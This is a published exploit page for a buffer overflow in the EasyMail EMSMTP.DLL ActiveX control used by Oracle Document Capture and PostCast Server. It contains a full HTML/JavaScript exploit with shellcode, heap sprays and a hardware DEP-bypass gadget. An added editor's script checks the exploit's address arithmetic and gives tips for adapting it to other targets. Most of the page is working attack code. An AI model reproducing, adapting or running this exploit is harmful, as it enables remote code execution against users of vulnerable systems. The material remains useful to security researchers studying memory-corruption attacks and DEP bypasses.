

[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass

*CALL-DEP-RET-ActiveX-exploit.html
----------

This is the exploit for the QuikSoft EasyMail ActiveX control emsmtp.dll (v. 6.0.1).
This DLL is used in:
PostCast Server Pro 3.0.61
Oracle Document Capture 10.1.3.5

The exploit uses a heap spray together with a CALL [ESI+CC] instruction in the
emsmtp.dll code (with ESI pointing into the sprayed heap) to reach the DEP bypass
address in ntdll.dll, and the overwritten return address to take control of EIP.


# Title: EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control BOF (hardware DEP bypass)
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 2009-11-12
# Verified: yes

<HTML>
<HEAD>
<TITLE>"][akep": ActiveX CALL-DEP-RET Sploit (Hard-DEP)</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></object>
<!--by Alexey Sintsov from DSecRG [www.dsecrg.com]-->
<!--this sploit uses CALL [ESI+CC] for DEP bypass-->
<!--and the return address for the shellcode-->
<!--original advisory: http://security-assessment.com/files/advisories/easymail_advisory.pdf -->
<!--rgod is credited with the discovery of this issue.-->
<SCRIPT>

function Exploit(){

//Shellcode generated with Metasploit: exec notepad.exe
var shell =
unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u746f%u7065%u6461%u0000");

var mem=new Array();
var i=0;

//Heap spray with the DEP bypass address in ntdll.dll
//(XP SP3 - 0x7C91cd26)
//(XP SP2 - 0x7c91d3fa)
//each block is filled with the XP SP2 address and terminated with the XP SP3 one
var bigbk=unescape("%ud3fa%u7c91");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unescape("%ucd26%u7c91");


//Heap spray with a NOP sled followed by the shellcode
var bigbk2=unescape("%u9090%u9090%u9090%u9090");
while(bigbk2.length<0x40000) bigbk2=bigbk2+bigbk2;
for(; i<400;i++) mem[i]=bigbk2+shell;

//Shellcode lands at 0x0D0D0D0D
//DEP bypass address is read from 0x050505D4 = ESI + 0xCC
//(0x24 bytes of heap header, then a 4-byte-aligned offset into the sprayed addresses)
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;

buf+=unescape("%08%05%05%05"); //ESI = 0x05050508, so CALL [ESI+CC] fetches the sprayed DEP bypass address
buf+="ffff"+unescape("%0D%0D%0D%0D"); //4 bytes of padding, then the return address 0x0D0D0D0D into the sprayed shellcode

vuln.SubmitToExpress(buf);

}
Exploit();
</SCRIPT>
</BODY>
</HTML>
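The exploit above stands or falls on a few hard-coded numbers: the spray block size produced by the doubling loop, the offsets of the ESI value and the return address in the overflow, and whether ESI+0xCC lands on a 4-byte-aligned copy of the ntdll address inside a sprayed block. The following is an added example written by the editor, not code from the DSecRG exploit or from the advisory, that models that arithmetic so the constants can be checked before the spray is run. CALL_DISP, ESI, RET and the two ntdll addresses are the values from the page; HEADER_LEN (0x24, taken from the exploit's own comment) and BLOCK_BASE are assumptions for illustration only, since real heap placement varies and must be confirmed in a debugger.

```javascript
// Added example (editor's code, not part of the DSecRG exploit): model the
// address arithmetic the exploit depends on. Page constants are marked as such;
// HEADER_LEN and BLOCK_BASE are assumptions for illustration.

const CALL_DISP = 0xcc;            // displacement in CALL [ESI+CC] (page)
const ESI = 0x05050508;            // value the overflow places in ESI (page)
const RET = 0x0d0d0d0d;            // overwritten return address -> NOP sled (page)
const GADGET_XP_SP2 = 0x7c91d3fa;  // ntdll.dll DEP bypass address filling each block (page)
const GADGET_XP_SP3 = 0x7c91cd26;  // appended once at the end of each block (page)
const HEADER_LEN = 0x24;           // assumed: bytes from block base to string data
const BLOCK_BASE = 0x05000000;     // assumed: base of one sprayed block

// Same doubling loop as the exploit ("while(s.length<limit) s=s+s"): returns the
// final string length. A seed whose length is a power of two lands exactly on
// the limit; any other seed overshoots, which changes every block size.
function grownLength(seedLen, limit) {
  let n = seedLen;
  while (n < limit) n += n;
  return n;
}

// Little-endian dword as four one-byte characters (like unescape("%08%05%05%05")).
function le32(v) {
  return String.fromCharCode(v & 0xff, (v >>> 8) & 0xff, (v >>> 16) & 0xff, (v >>> 24) & 0xff);
}

// Reads a little-endian dword back out of such a string.
function readLE32(s, off) {
  return (s.charCodeAt(off) | (s.charCodeAt(off + 1) << 8) |
          (s.charCodeAt(off + 2) << 16) | (s.charCodeAt(off + 3) << 24)) >>> 0;
}

// Builds the overflow exactly as Exploit() does: 260 filler bytes, the ESI value,
// 4 bytes of padding, then the return address.
function buildOverflow(esi, ret) {
  let buf = "";
  while (buf.length < 260) buf += "c";
  return buf + le32(esi) + "ffff" + le32(ret);
}

// Address that CALL [ESI+CC] dereferences.
function callTarget(esi) {
  return (esi + CALL_DISP) >>> 0;
}

// The dword the CPU would read at `addr` from a sprayed block whose string data
// starts at `dataStart`, is `dataLen` bytes long and repeats `gadget` as a
// little-endian dword (unescape("%ud3fa%u7c91") is the bytes fa d3 91 7c).
// Returns null outside the block. A read that is not 4-byte aligned with the
// pattern yields a byte-rotated value, i.e. a bogus address; that is the failure
// the exploit's "0x24 heap header" comment is accounting for.
function sprayRead(addr, dataStart, dataLen, gadget) {
  if (addr < dataStart || addr + 4 > dataStart + dataLen) return null;
  const pat = [gadget & 0xff, (gadget >>> 8) & 0xff, (gadget >>> 16) & 0xff, (gadget >>> 24) & 0xff];
  const k = (addr - dataStart) % 4;
  const b = (i) => pat[(k + i) % 4];
  return (b(0) | (b(1) << 8) | (b(2) << 16) | (b(3) << 24)) >>> 0;
}

// Sanity checks for the constants on the page.
function checkLayout() {
  const overflow = buildOverflow(ESI, RET);
  // UTF-16 chars -> bytes, plus the one SP3 dword appended per block
  const blockBytes = 2 * grownLength(2, 0x40000) + 4;
  const dataStart = BLOCK_BASE + HEADER_LEN;
  return {
    overflowLength: overflow.length,                       // 272
    esiFromStack: readLE32(overflow, 260),                 // 0x05050508
    retFromStack: readLE32(overflow, 268),                 // 0x0D0D0D0D
    target: callTarget(ESI),                               // 0x050505D4
    aligned: sprayRead(callTarget(ESI), dataStart, blockBytes, GADGET_XP_SP2),       // 0x7C91D3FA
    misaligned: sprayRead(callTarget(ESI) + 1, dataStart, blockBytes, GADGET_XP_SP2) // 0xFA7C91D3
  };
}
```

The misaligned read is the case worth keeping in mind when adapting this to another target: with the pattern fa d3 91 7c repeating, reading one byte off gives 0xFA7C91D3, a kernel-range address that CALL will fault on, so any change to the header size, the seed string or the ESI value has to keep ESI+0xCC on a dword boundary of the sprayed data. With the 4-byte SP3 address appended once per block the SP2 address is what almost every dword in the spray holds; the SP3 value is only ever hit at the very end of a block.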

Published in the DSecRG exploits list on 15.02.2010:
[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass